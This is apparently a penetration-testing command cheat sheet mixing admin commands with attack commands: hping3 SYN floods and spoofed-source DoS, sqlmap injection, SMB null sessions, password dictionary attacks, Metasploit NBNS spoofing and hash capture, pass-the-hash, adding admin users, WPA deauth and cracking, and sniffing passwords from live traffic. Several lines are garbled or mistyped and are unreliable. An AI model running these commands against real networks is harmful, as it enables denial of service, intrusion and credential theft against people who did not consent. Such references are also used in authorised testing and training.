# Get a MySQL DB dump from a remote machine
ssh user@host "mysqldump -h localhost -u mysqluser -pP@$$W3rD databasename | gzip -cf" | gunzip -c > database.sql


# Export MySQL query as .csv file
echo "SELECT * FROM table; " | mysql -u root -p${MYSQLROOTPW} databasename | sed 's/\t/","/g;s/^/"/;s/$/"/;s/\n//g' > outfile.csv


##-===============-##
##   [+] Post
##-===============-##
sqlmap -r $File.txt -p tfUPass


##-===============-##
##   [+] Get
##-===============-##
sqlmap -u "http://$IP/index.php?id=1" --dbms=mysql


##-===============-##
##   [+] Crawl
##-===============-##
sqlmap -u http://$IP --dbms=mysql --crawl=3


##-===============-##
##   [+]
##-===============-##
sslscan $domain:443


##-=============================-##
##  [+] ICMP Ping
##-=============================-##
hping3 -1 $IP


##-=============================-##
##  [+] ACK Scan on port 80
##-=============================-##
hping3 -A $IP -p 80


##-=============================-##
##  [+] UDP Scan on port 80
##-=============================-##
hping3 -2 $IP p 80


##-=============================-##
##  [+] SYN Scan on port 50-60
##-=============================-##
hping3 -8 50-60 -s $IP -v


##-=============================-##
##  [+] FIN PUSH URG Scan
##-=============================-##
hping3 -F -p -U $IP -p 80


##-=============================-##
##  [+] Scan Entire Subnet
##-=============================-##
hping3 -1 10.0.1.x --rand-dest -I eth0


##-=======================================================-##
##  [+] Intercept All Traffic Containing HTTP Signature:
##-=======================================================-##
hping3 -9 HTTP -I eth0


##-=======================================-##
##  [+] Collect Initial Sequence Number:
##-=======================================-##
hping3 $IP -Q -p 139 -s


##-=============================-##
##  [+]
##-=============================-##
hping3 -S -p 53 $IP


##-=============================-##
##  [+]
##-=============================-##
hping3 --udp -p 500 $IP
hping3 --udp -p 123 $IP


##-=============================-##
##  [+]
##-=============================-##
hping3 -V -p 80 -s 5050 <scan_type> $Domain


  * `-V|--verbose` - verbose mode
  * `-p|--destport` - set destination port
  * `-s|--baseport` - set source port
  * `<scan_type>` - set scan type
    * `-F|--fin` - set FIN flag, port open if no reply
    * `-S|--syn` - set SYN flag
    * `-P|--push` - set PUSH flag
    * `-A|--ack` - set ACK flag (use when ping is blocked, RST response back if the port is open)
    * `-U|--urg` - set URG flag
    * `-Y|--ymas` - set Y unused flag (0x80 - nullscan), port open if no reply
    * `-M 0 -UPF` - set TCP sequence number and scan type (URG+PUSH+FIN), port open if no reply


##-=============================-##
##  [+]
##-=============================-##
hping3 -V -c 1 -1 -C 8 $Domain


  * `-c [num]` - packet count
  * `-1` - set ICMP mode
  * `-C|--icmptype [icmp-num]` - set icmp type (default icmp-echo = 8)


##-=============================-##
##  [+]
##-=============================-##
hping3 -V -c 1000000 -d 120 -S -w 64 -p 80 --flood --rand-source <remote_host>


##-======================-##
##   [+] HPING3 Scans
##-======================-##
hping3 -c 3 -s 53 -p 80 -S 192.168.0.1

## Open = flags = SA
## Closed = Flags = RA
## Blocked = ICMP unreachable
## Dropped = No response


## takes a text file called udp.txt and sends probes to each UDP port number listed in that file

for port in `cat udp.txt`; do echo TESTING UDP PORT: $port; hping3 -2 -p $port -c 1 $IP; done


DoS from spoofed IPs:

hping3 $TargetIP --flood --frag --spoof $ip --destport # --syn


hping3 -S -p 25 -c 5 host Send 5 TCP packets, with the SYN flag set, to port 25 of remote host
hping3 --scan 1-1024 -S host Perform a SYN scan on ports 1 to 1024 against the remote host
hping3 --udp --rand-source --data 512 host Send UDP packets with random source address and a data body size
of 512 bytes
hping3 -S -p 80 --flood host Perform a TCP SYN flood DoS attack against a webserver
hping3 -A -p 25 host


smb:// ip /share                            ## Access windows smb share
share user x.x.x.x c$                       ## Mount Windows share
smbclient -0 user\\\\ ip \\ share           ## Sl1B connect

/var/log/messages | grep DHCP               ## List DHCP assignments
echo "1" /proc/sys/net/ipv4/ip forward      ## Turn on IP Forwarding

scp /tmp/$File user@x.x.x.x:/tmp/$File        ## Put file
scp user@ remoteip :/tmp/$File /tmp/$File     Get file


##-====================================-##
##   [+] Service Message Block (SMB)
##-====================================-##
systemctl enable smb
systemctl start
systemctl status smb


##-=============================-##
##  [+]
##-=============================-##
smbclient -L\\ -N -I $IP
smbclient -L //localhost -U $User


##-================================-##
##  [+] Provide the target host:
##-================================-##
smbclient -L\\ -N -I $1 2>&1 | tee "smbclient_$1.txt"


smbclient //MOUNT/share -I target -N


##-================================-##
##  [+] Mount SMB/CIFS shares
##-================================-##
mount.cifs // ip /share /mnt/share -o user=$User,pass=$Pass,sec=ntlrnssp,domain=$Domain,rw


mount -t cifs -o username=$User,password=$Pass //serverip/share_name /mnt/mountlocation

/etc/fstab
//serverip/share_name /mnt/mountlocation cifs username=$User,password=$Pass 0 0


##-====================================-##
##  [+] Mount Remote Windows Share:
##-====================================-##
smbmount //X.X.X.X/c$ /mnt/remote/ -o username=$User,password=$Pass,rw


##-=============================-##
##  [+]
##-=============================-##
## Samba file share on the Samba server,
## the one client user is added to the tdbsam user database

smbpasswd -a $User


##-=========================================================-##
##  [?] user accounts are displayed using a short listing

pdbedit -L


##-==========================-##
## -------------------------- ##
##   [+] SMB Enumeration
## -------------------------- ##
##-==========================-##


##-==========================-##
##   [+] SMB OS Discovery
##-==========================-##
nmap $ip --script smb-os-discovery.nse

##-==========================-##
##   [+] Nmap port scan
##-==========================-##
nmap -v -p 139,445 -oG $File.txt $IP-254

##-======================================-##
##   [+] Netbios Information Scanning
##-======================================-##
nbtscan -r $IP/24               ## Netbios Information Scanning

##-=====================================================-##
##   [+] Netbios Scan - Tee Output To Console +_File:
##-=====================================================-##
nbtscan -rvh $IP 2>&1 | tee "nbtscan-$IP.txt"


##-===========================================-##
##   [+] Nmap find exposed Netbios servers
##-===========================================-##
nmap -sU --script nbstat.nse -p 137 $IP

##-======================================-##
##   [+] Nmap all SMB scripts scan
##-======================================-##
nmap -sV -Pn -vv -p 445 --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script args=unsafe=1 $IP

##-=================================================-##
##   [+] Nmap all SMB scripts authenticated scan
##-=================================================-##
nmap -sV -Pn -vv -p 445 --script-args smbuser=$User,smbpass=$Pass --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip


##-==================================-##
##   [+] SMB Enumeration Tools
##-==================================-##
nmblookup -A $IP

smbclient //MOUNT/share -I $IP -N

rpcclient -U "" $IP

enum4linux $IP
enum4linux -a $IP                       ## Do all simple enumeration
smbtree -NS 2>/dev/null                 ## smb network browser

smbgetserverinfo -v -i $IP
smbdumpusers -i $IP


smbmap -u jsmith -p password1 -d workgroup -H 192.168.0.1
smbmap -u jsmith -p 'aad3b435b51404eeaad3b435b51404ee:da76f2c4c96028b7a6111aef4a50a94d' -H 172.16.0.20
smbmap -u 'apadmin' -p 'asdf1234!' -d ACME -H 10.1.3.30 -x 'net group "Domain Admins" /domain'

##-===============================-##
##   [+] SMB Finger Printing
##-===============================-##
smbclient -L //$IP

##-======================================-##
##   [+] Nmap Scan for Open SMB Shares
##-======================================-##
nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=$User,smbpass=$Pass -p445 192.168.10.0/24

##-================================================-##
##   [+] Nmap scans for vulnerable SMB Servers
##-================================================-##
nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 $IP


nmap --script="+*smb* and not brute and not dos and not fuzzer" -p 139,445 -oN smb-vuln $ip


##-==============================-##
##   [+] NBNS Spoof / Capture
##-==============================-##

##-=====================-##
##   [+] NBNS Spoof
##-=====================-##
msf > use auxiliary/spoof/nbns/nbns_response
msf auxiliary(nbns_response) > show options
msf auxiliary(nbns_response) > set INTERFACE eth0
msf auxiliary(nbns_response) > set SPOOFIP 10.10.10.10
msf auxiliary(nbns_response) > run


##-=====================-##
##   [+] SMB Capture
##-=====================-##
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > set JOHNPWFILE /tmp/john_smb
msf auxiliary(smb) > run


## ----------------------------------------------------------------------- ##
##   [?] accceck - Windows Password dictionary attack tool for SMB
## ----------------------------------------------------------------------- ##
acccheck.pl -T $SMBIPs.txt -v >> $File.txt


##-=====================================================================-##
##   [+] Attempt the 'Administrator' account with a [BLANK] password:
##-=====================================================================-##
acccheck -t $IP

##-=====================================================================================-##
##   [+] Attempt all passwords in 'password.txt' against the 'Administrator' account:
##-=====================================================================================-##
acccheck -t $IP -P $File.txt


##-================================================================================-##
##   [+] Attempt all password in 'password.txt' against all users in 'users.txt':
##-================================================================================-##
acccehck -t $IP -U $UsersFile.txt -P $PassFile.txt

##-=========================================================-##
##   [+] Attempt a single password against a single user:
##-=========================================================-##
acccheck -t $IP -u $User -p $Pass


##-==================================================-##
##   [+] Search The NMap Directory For SMB Scripts
##-==================================================-##
ls /usr/share/nmap/scripts/* | grep smb


##-===============================-##
##   [+] Netbios Enumeration
##-===============================-##
nbtscan -r $IP/24                               ## Netbios Information Scanning
nbtscan -r 192.168.0.1-100
nbtscan -f $HostFile.txt


##-===================================-##
##   [+] Null Session in Windows
##-===================================-##
net use \\192.168.0.1\IPC$ "" /u:""

##-================================-##
##   [+] Null Session in Linux
##-================================-##
smbclient -L //192.168.99.131

smbclient -L=10.0.2.15
smbclient \\\\10.0.2.15\\tmp


##-==============================-##
##   [+] Windows Information
##-==============================-##
ipconfig /all
systeminfo
net localgroup administrators
net view
net view /domain

##-==========================-##
##   [+] Add Windows User
##-==========================-##
net user $User password@1 /add
net localgroup administrators username /add


List existing group mapping entries.
net groupmap list


##  Perform a raw LDAP search on a ADS server and dump the results
net ads search '(objectCategory=group)' sAMAccountName

##  The LDAP DN and the attributes are a list of
##  LDAP fields to show in the result
net ads dn 'CN=administrator,CN=Users,DC=my,DC=domain' SAMAccountName


net getauthuser             ## Get the current winbind auth user settings.
net status shares           ##
net printing dump           ## Dump tdb printing file

net rap service             ## List services on remote server
net rap service start       ## Start service on remote server
net rap service stop        ## Stop named serve on remote server


--user=$User                ## user name
--server=$Server            ## server name
--workgroup=$Workgroup      ##
--ipaddress=$IP             ## address of target server
--machine-pass $Pass        ## Authenticate as machine account
--encrypt                   ## Encrypt SMB transport


net usershare add $ShareName $Path [comment [acl] [guest_ok=[y|n]]] - to add or change a user defined share.
net usershare delete sharename - to delete a user defined share.
net usershare info [-l|--long] [wildcard sharename] - to print info about a user defined share.
net usershare list [-l|--long] [wildcard sharename] - to list user defined shares.

net [rpc] conf list - Dump the complete configuration in smb.conf like format.
net [rpc] conf import - Import configuration from file in smb.conf format.
net [rpc] conf listshares - List the registry shares.
net [rpc] conf drop - Delete the complete configuration from registry.
net [rpc] conf showshare - Show the definition of a registry share.
net [rpc] conf addshare - Create a new registry share.
net [rpc] conf delshare - Delete a registry share.
net [rpc] conf setparm - Store a parameter.
net [rpc] conf getparm - Retrieve the value of a parameter.
net [rpc] conf delparm - Delete a parameter.
net [rpc] conf getincludes - Show the includes of a share definition.
net [rpc] conf setincludes - Set includes for a share.
net [rpc] conf delincludes - Delete includes from a share definition.


net ads enctypes list Computername          ## List the value of the "msDS-SupportedEncryptionTypes" attribute

net dom join - Join a remote computer into a domain.
net dom unjoin - Unjoin a remote computer from a domain.
net dom join -S xp -U XP\\administrator%secret domain=MYDOM account=MYDOM\\administrator password=topsecret reboot

net eventlog dump - Dump a eventlog *.evt file on the screen


net registry enumerate              #[?] Enumerate registry keys and values.
net registry enumerate_recursive    #[?] Enumerate registry key and its subkeys.
net registry createkey              #[?] Create a new registry key.
net registry deletekey              #[?] Delete a registry key.
net registry deletekey_recursive    #[?] Delete a registry key with subkeys.
net registry getvalue               #[?] Print a registry value.
net registry getvalueraw            #[?] Print a registry value (raw format).
net registry setvalue               #[?] Set a new registry value.
net registry increment              #[?] Increment a DWORD registry value under a lock.
net registry deletevalue            #[?] Delete a registry value.
net registry getsd                  #[?] Get security descriptor.
net registry getsd_sdd1             #[?] Get security descriptor In sddl format.
net registry setsd_sdd1             #[?] Set security descriptor from sddl format string.
net registry import                 #[?] Import a registration entries (.reg) file.
net registry export                 #[?] Export a registration entries (.reg) file.
net registry convert                #[?] Convert a registration entries (.reg) file.
net registry check                  #[?] Check and repair a registry database.


systemctl start slapd.service
systemctl enable slapd.service > /dev/null 2>&1
slappasswd -s 1234 -n > /etc/openldap/passwd


Anonymous Bind:
ldapsearch -h ldaphostname -p 389 -x -b "dc=domain,dc=com"

Authenticated:
ldapsearch -h 192.168.0.60 -p 389 -x -D "CN=Administrator, CN=User, DC=<domain>, DC=com" -b "DC=<domain>, DC=com" -W


Look for anonymous bind
ldapsearch -x -b "dc=megabank,dc=local" "*" -h $ip


slapcat -v -l backup_ldap.ldif


ps -ef | grep slapd

/etc/default/slapd
/etc/ldap/
ldap.conf       --> basic server config
sasl2/          --> SASL2 authentication support
schema/         --> default schemas
slapd.d/        --> new/modified items/ldifs data - do not edit manually, use instead: slapd-config, ldapadd, ldapmodify, ldapdelete,ldapsearch, etc ('dpkg -L ldap-utils' to get a list of all client commands and other files)
/var/lib/ldap   --> DB directory. Contains DITs, ex:

cn=config (default)     - root of configuration of LDAP instance server wide.
dc=frozza, dc=com

/var/run/slapd/
slapd.pid       --> current pid
slapd           --> arguments used during invocation
ldapi           --> UDS

netstat -ntl    --> shows tcp 389


##-======================================-##
##   [+] OpenVAS Vulnerability Scanner
##-======================================-##

##-==============================-##
##   [+] OpenVAS Initial Setup
##-==============================-##


##-==============================-##
##   [+] run the initial setup
##-==============================-##
openvas-setup


##-==================-##
##   [+] add user
##-==================-##
openvas-adduser


##-=====================================================-##
##   [+] launch Greenbone Security Desktop and log in
##-=====================================================-##
gsd


##-=================-##
##   [+] OpenVAS
##-=================-##
openvas-setup
https://localhost:9392


openvas-check-setup
openvas-stop
openvas-start
openvasmd --user=$User --new-password=$Pass
openvasmd --create-user $User


##-===============================-##
##   [+] Vulnerability Scanning
##-===============================-##
nmap -Pn -sT -sU  -p $ports --script=*vuln*  -vv -oN nmap_vuln  $ip


airmon-ng start wlan0               ## put your network device into monitor mode

listen for all nearby beacon frames to get target BSSID and channel

airodump-ng mon0


airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0

aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt $File.cap

aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 mon0


# put your network device into monitor mode
airmon-ng start wlan0

# listen for all nearby beacon frames to get target BSSID and channel
airodump-ng mon0

# start listening for the handshake
airodump-ng -c 6 --bssid 9C:5C:8E:C9:AB:C0 -w capture/ mon0

# optionally deauth a connected client to force a handshake
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0

# crack w/ aircrack-ng
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt capture/$File.cap


Reaver
------

airmon-ng start wlan0
airodump-ng wlan0
reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv
reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -S --no-nacks -d7 -vv -c 1


Pixie WPS
---------

airmon-ng check
airmon-ng start wlan0
airodump-ng mon0 --wps
reaver -i wlan0mon -c 11 -b 00:00:00:00:00:00 -K 1


##-=========================-##
##   [+] types of scans:
##-=========================-##

- **Ping sweeps**: Send a variety of packet types (including ICMP Echo Requests, but many others as well).
- **ARP scans**: Identify which hosts are on the same LAN as the machine running Nmap. The ARP scan does not work through a router, because ARP traffic just goes on a single LAN.
- **Connect scans**: Complete the three-way handshake; are slow and easily detected. Because the entire handshake is completed for each port in the scan, the activities are often logged on the target system.
- **SYN scans**: Only send the initial SYN and await the SYN-ACK response to determine if a port is open. The final ACK packet from the attacker is never sent. The result is an increase in performance and a much more stealthy scan. Because most host systems do not log a connection unless it completes the three-way handshake, the scan is less likely to be detected (NOT ANYMORE).
- **ACK scans**: Particularly useful in getting through simple router-based firewalls. If a router allows “established” connections in (and is not using any stateful inspection), an attacker can use ACK scans to send packets into the network. ACK scans are useful for mapping, but not for port scanning.
- **FIN scans**: Send packets with the FIN control bit set in an effort to be stealthy and get through firewalls.
- **FTP Proxy “Bounce Attack” scans**: Bounce an attack off a poorly configured FTP server.
- **“Idle” scans**: This scan type can be used to divert attention, obscuring the attackers location on the network.
- **UDP scanning**: Helps locate vulnerahle UDP services. For most UDP ports, Nmap sends packets with an empty payload. But, for about a dozen specific ports, Nrnap includes an application-appropriate payload for the given port, including UDP port 53 (DNS), 111 (portmapper). 161 (SNMP), etc.
- **Version scanning**: Tries to detemine the version number of the program listening on a discovered port for both TCP and UDP.
- **IPv6 scanning**: Iterates through a series of lPv6 addresses, scanning for target systems and ports, invoked with the “-6” syntax. Today, all Nmap scan types support a -6 option. In older versions of Nmap, IPv6 scans were limited to ping sweeps to identify target host addresses in use, TCP connect scans, and version scans only.
- **RPC scanning**: Identifies which Remote Procedure Call services are offered by the target machine.
- **TCP sequence prediction**: Useful in spooling attacks, as we shall see in a short while.


# Nmap enumerate SSL ciphers on remote host/port
$ nmap -Pn -p 5986 --script=ssl-enum-ciphers <TARGET>


# HPING3 Scans
hping3 -c 3 -s 53 -p 80 -S 192.168.0.1
# Open = flags = SA
# Closed = Flags = RA
# Blocked = ICMP unreachable
# Dropped = No response

# Metasploit Auxiliarys:
metasploit> use auxiliary/gather/dns


### Finger - Enumerate Users

finger @192.168.0.1
finger -l -p user@ip-address
metasploit> use auxiliary/scanner/finger/finger_users


##-======================================-##
##   [+] Get Cisco network information
##-======================================-##
tcpdump -nn -v -i eth0 -s 1500 -c 1 'ether[20:2] == 0x2000'


##-======================================-##
##   [+] analyze traffic remotely over ssh w/ wireshark
##-======================================-##
ssh root@server.com 'tshark -f "port !22" -w -' | wireshark -k -i -


tcpdump ‐n ‐r $File.pcap | awk ‐F" " '{print $3}' | sort ‐u | head


##-=============================================================-##
##   [+] select traffic between helios and either hot or ace:
##-=============================================================-##
host helios and \( hot or ace \)


##-======================================================================-##
##   [+] select all IP packets between ace and any host except helios:
##-======================================================================-##
ip host ace and not helios


##-================================================================-##
##   [+] select all ftp traffic through internet gateway snup:
##-================================================================-##
gateway snup and (port ftp or ftp-data)


##-==========================================================================-##
##   [+] Select traffic neither sourced from nor destined for local hosts
##-==========================================================================-##
ip and not net localnet


##-==========================================-##
##   [+] select the start and end packets
##-==========================================-##
## ------------------------------------------------------------ ##
##   [?] The SYN and FIN packets of each
##       TCP conversation that involves a non-local host.
## ------------------------------------------------------------ ##
tcp[tcpflags] & (tcp-syn|tcp-fin) != 0 and not src and dst net localnet


##-=========================================================-##
##   [+] select all IPv4 HTTP packets to and from port 80
##   [+] print only packets that contain data
##-=========================================================-##
## ---------------------------------------------------------------------- ##
##   [?] for example, not SYN and FIN packets and ACK-only packets.
## ---------------------------------------------------------------------- ##
tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)


##-===================================================-##
##   [+] select IP packets longer than 576 bytes
##   [+] sent through gateway snup:
##-===================================================-##
gateway snup and ip[2:2] > 576


##-=================================================================-##
##   [+] select IP broadcast or multicast packets
##   [+] that were not sent via Ethernet broadcast or multicast:
##-=================================================================-##
ether[0] & 1 = 0 and ip[16] >= 224


##-===================================================================-##
##   [+] select all ICMP packets that are not echo requests/replies
##-===================================================================-##
## ---------------------------------- ##
##   [?] (i.e., not ping packets)
## ---------------------------------- ##
icmp[icmptype] != icmp-echo and icmp[icmptype] != icmp-echoreply


##-====================================-##
##   [+] catch all multicast traffic
##-====================================-##
'ether[0] & 1 != 0'


##-============================================-##
##   [+] catch all IPv4 packets with options
##-============================================-##
'ip[0] & 0xf != 5'


##-===============================================-##
##   [+] catch only unfragmented IPv4 datagrams
##-===============================================-##
'ip[6:2] & 0x1fff = 0'


##-==========================================================-##
##   [+] match only tcp packets whose source port is $Port
##-==========================================================-##
tcp src port $Port


##-====================================-##
##   [+]
##-====================================-##
tcp port 21, 'udp portrange 7000-7009', 'wlan addr2 0:2:3:4:5:6'


##-====================================-##
##   [+]
##-====================================-##
portrange port1-port2


##-====================================-##
##   [+]
##-====================================-##
port domain


##-===================================================-##
##   [+]
##-===================================================-##
tcpxtract --file $File.pcap --output $File --device eth0


## ------------------------------------------------------------------------------------------------ ##
    tcpdump -lnni eth0 tcp
## ------------------------------------------------------------------------------------------------ ##
    tcpdump -lnni eth0 port 22
## ------------------------------------------------------------------------------------------------ ##
    tcpdump -lnni eth0 src 10.0.0.10
## ------------------------------------------------------------------------------------------------ ##
    tcpdump -lnni eth0 dst 10.0.0.10
## ------------------------------------------------------------------------------------------------ ##
    tcpdump -lnni eth0 'udp port 53'
## ------------------------------------------------------------------------------------------------ ##
    tcpdump -lnni eth0 'tcp port 443'
## ------------------------------------------------------------------------------------------------ ##
    tcpdump -lnni eth0 'dst 10.0.0.10 and dst port 443'
## ------------------------------------------------------------------------------------------------ ##
    tcpdump -w out.pcap -s 65535 'udp port 53'
## ------------------------------------------------------------------------------------------------ ##


## ------------------------------------------------------------------------------------------------ ##
    tcpdump -r $Capture.pcap                             ## Read the file
## ------------------------------------------------------------------------------------------------ ##
    tcpdump -n src host 192.168.2.10 -r $Capture.pcap     ## Filter By Source
## ------------------------------------------------------------------------------------------------ ##
    tcpdump -n dst host 192.168.2.12 -r $Capture.pcap     ## Filter By Destination
## ------------------------------------------------------------------------------------------------ ##
    tcpdump -n port 443 -r $Capture.pcap                  ## Filter By Port
## ------------------------------------------------------------------------------------------------ ##
    tcpdump -nX -r $Capture.pcap                          ## Read the file and dump in hex format
## ------------------------------------------------------------------------------------------------ ##


##-====================================-##
##   [+] convert a .cap file to .txt:
##-====================================-##
tshark -V -r $File > $File


## ------------------------------------------------------------------------------------------------ ##
    tshark -i any -f 'port http' -Y http -l -N nNC      ## HTTP Protocol Traffic
## ------------------------------------------------------------------------------------------------ ##
    tshark -i any -f 'port smtp' -Y smtp -l -N nNC      ## SMTP Protocol Traffic
## ------------------------------------------------------------------------------------------------ ##
    tshark -i any -f 'port imap' -Y imap -l -N nNC      ## IMAP Protocol Traffic
## ------------------------------------------------------------------------------------------------ ##


##-===========================================-##
##          [+] Protocol Statistics:
##-===========================================-##
tshark -r $File -q -z ptype,tree


##-============================================-##
##              [+] HTTP Statistics
##-============================================-##
tshark -r $File -q -z http,stat,


##-===================================================-##
##          [+] HTTP Statistics with Rates
##-===================================================-##
tshark -r $File -q -z http,tree


##-===================================================-##
##          [+] TOP 10 HTTP Request URL
##-===================================================-##
tshark -r $File -R http.request -T fields -e http.host | sed -e 's/?.*$//' | sed -e 's#^\(.*\)\t\(.*\)$#http://\1\2#' | sort | uniq -c | sort -rn | head -n 10


##-===================================================-##
##          [+] TOP 10 talkers by Source IP
##-===================================================-##
tshark -r $File -T fields -e ip.src | sort | uniq -c | sort -rn | head -10


##-===================================================-##
##          [+] TOP 10 talkers by DST IP
##-===================================================-##
tshark -r $File -T fields -e ip.dst | sort | uniq -c | sort -rn | head -10


##-=====================================================-##
##   [+] TOP 10 talkers by port usage or SYN attempts
##-=====================================================-##
tshark -r $File -T fields -e ip.src "tcp.flags.syn==1 && tcp.flags.ack==0" | sort | uniq -c | sort -rn | head -10


##-===================================================-##
##   [+] HTTP 10 Response Code 200 and Content Type
##-===================================================-##
tshark -r $File -R http.response.code==200 -T fields -e "http.content_type" |sort |uniq -c | sort -rn | head -10


##-===================================================-##
##      [+] TOP HTTP Host and Request Method
##-===================================================-##
tshark -r $File -R http.host -T fields -e http.host -e http.request.method |sort |uniq -c | sort -rn | head -10


##-===================================================-##
##          [+] TOP 10 DNS Query DST Host
##-===================================================-##
tshark -r $File -T fields -e dns.qry.name -R "dns.flags.response eq 0" |sort |uniq -c | sort -rn | head -10


##-===================================================-##
##          [+] TOP 10 DNS Query by Soure IP
##-===================================================-##
tshark -r $File -T fields -e ip.src -R "dns.flags.response eq 0" |sort |uniq -c | sort -rn | head -10


##-===================================================-##
##          [+] TOP 10 ICMP Conversations
##-===================================================-##
tshark -r $File -V icmp -T fields -e icmp.ident -e ip.src |sort |uniq -c | sort -rn | head -10


## ---------------------------------------------------------------------- ##
##   [?] Use a filesize-based “ring buffer” of 10 files, 100MB each.
##   [?] Overwrite oldest file after 10 files have been created.
##   [?] 2nd+ output files will have a digit appended to the filename
##   [?] (e.g. “output.pcap0”, output.pcap1”, etc.).
## ---------------------------------------------------------------------- ##
tcpdump -nn -i eth0 -w $File.pcap -C 100 -W 10


## ---------------------------------------------------------------------- ##
##   [?] Use a time-based ring buffer with 14 files,
##   [?] which contain 12 hours (43,200 seconds).
##   [?] Overwrite oldest file after 10 files have been created.
##   [?] Filenames will contain appended digits as described above.
## ---------------------------------------------------------------------- ##
tcpdump -nn -i eth0 -w $File.pcap -G 43200 -W 14


##-============================================================================-##
##   [+] capture the entire contents of each packet (a.k.a “snaplen zero”.)
##-============================================================================-##
tcpdump -nn -i eth0 -w $File.pcap -s 0


##-===================================================-##
##   [+] Capture only first 56 bytes of each frame
##-===================================================-##
## -------------------------------------------------------------- ##
##   [?] enough to cover the IP header and typical TCP header.
## -------------------------------------------------------------- ##
tcpdump -nn -i eth0 -w $File.pcap -s 56


##-===================================================-##
##   [+]
##-===================================================-##
tshark -f "tcp port 80" -i eth0


##-==================================-##
##   [+] listening on UDP port 53:
##-==================================-##
tcpdump -As80 -tni eth0 "udp port 53"


##-===========================-##
##   [+] Password Sniffing
##-===========================-##
tcpdump -i eth0 port http or port ftp or port smtp or port imap or port pop3 -l -A | egrep –i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=||name=|name:|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-


##-===================================================-##
##   [+]
##-===================================================-##
tshark –r $File.pcap -2 –R http.request.uri –Tfields –e ip.dst –e http.request.full_uri –e http.user_agent –e data –E separator=, | cut –c1-91


##-=======================================================-##
##    [+] Filter out traffic with a source MAC of $MAC
##-======================================================-##
tshark -r $File.cap -2 -R "wlan.sa==$MAC && wlan.fc.type_subtype==0x08" -T fields -e frame.time.delta | head -n 2


+ Softflowd allows us to send the netflows according to our network data
+ Nfdump has the tools to get and process the netflow files that we have gotten from softflowd

**_Settings_**

Softflowd_

We can modify the softflowd interface
define the IP and port.

/etc/default/softflowd


##-============================-##
##    [+] start the demon softflowd
##-============================-##
/etc/init.d/softflowd start

##-========================================================-##
##    [+] check If we are getting the data and changing them to flows.
##-========================================================-##

softflowd -i interface -n IP:PORT -D

##-====================================-##
##     [+] Shows the statistics of the flows
##-====================================-##

softflowctl statistics


systemctl enable nfdump.service
```
Let's stop the service to change the settings (the port)
```
sudo pico /lib/systemd/system/nfdump.service
```
The nfdump's settings file is this
```
sudo vi /lib/systemd/system/nfdump.service
```
Reload systemd daemons and start ndfdump:
```
sudo systemctl daemon-reload
sudo systemctl start nfdump.service
```
We can be sure if the ports are OK using the netstat
```
netstat -n --udp --listen
```
Using the next command we can print the data through nfdump
```
nfdump -R /var/cache/nfdump
```

## Ndfump to manage the flows

nfdump -r nfcapd.2017xxxxx -o extended -o csv -q

Convert to CSV
```
nfdump -r file -o csv > output.csv
```
We can see the information of each field in the next URL "https://github.com/phaag/nfdump/blob/4dafc2dc050a7371afb2e0934f7989876bfc0870/bin/parse_csv.pl"

Filter IP
```
nfdump -r [input file] 'net 8.8.8.8/32'


##-===================================================-##
##   [+]
##-===================================================-##
nfdump -r $File -o "fmt:<fmt str>"


##-====================================================-##
##   [+] Extract Src Address,Dst Address, and Packets
##-====================================================-##
nfdump -r $File -o "fmt:%pkt,%sa,%da" > $File.csv


## ----------------------------------- ##
##    [?] Packets           | %pkt |
##    [?] Src Address       | %sa  |
##    [?] Dst Address       | %da  |
##    [?] TCP Flags         | %flg |
##    [?] Protocol          | %pr  |
##    [?] Src Address:Port  | %sap |
##    [?] Dst Address:Port  | %dap |
## ----------------------------------- ##


##-=========================================-##
##   [+] Read From File, Extracting Out:
##-=========================================-##
##   > Packets
##   > Src Address:Port
##   > Dst Address:Port
##   > TCP Flags
##-=========================================-##
nfdump -r $File -o "fmt:%pkt,%sap,%dap,%flg" > $File.csv


##-=============================================-##
##   [+] View the “topN” talkers to identify
##       the noisiest IPs by flow count.
##-=============================================-##
nfdump -r $File -s ip/flows -n 10


##-================================================================-##
##   [+] Display a limited number of records with the -c switch.
##-================================================================-##
nfdump -r $File -c <record_limit>


##-======================================-##
##   [+] Curl SOCKS5 Proxy Connection:
##-======================================-##
curl -s -m 10 --socks5 $hostport --socks5-hostname $hostport -L $URL


##-===========================================-##
##   [+] Bulk Download Files By Their URLs
##-===========================================-##
## ------------------------------------------------ ##
##   [?] The URL Links Are Fed To Curl From xarg
## ------------------------------------------------ ##
xargs -n 1 curl -O < $File


# geoip lookup

geoip(){curl -s "http://www.geody.com/geoip.php?ip=${1}" | sed '/^IP:/!d;s/<[^>][^>]*>//g' ;}


# Show current weather for any US city or zipcode

weather() { lynx -dump "http://mobile.weather.gov/port_zh.php?inputstring=$*" | sed 's/^ *//;/ror has occ/q;2h;/__/!{x;s/\n.*//;x;H;d};x;s/\n/ -- /;q';}


##-===============================================================-##
##   [+] Download all recently uploaded pastes on pastebin.com
##-===============================================================-##
elinks -dump https://pastebin.com/archive|grep https|cut -c 7-|sed 's/com/com\/raw/g'|awk 'length($0)>32 && length($0)<35'|grep -v 'messages\|settings\|languages\|archive\|facebook\|scraping'|xargs wget


##-======================================-##
##   [+]
##-======================================-##
grep 'href='
file
1 cut -d"/" -f3
I grep
url
lsort -u


##-======================================-##
##   [+] Check for title and all links
##-======================================-##
curl INSERTIPADDRESS -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'


##-===================================-##
##   [+] Look at page with just text
##-===================================-##
curl INSERTIPADDRESS -s -L | html2text -width '99' | uniq


##-===============================-##
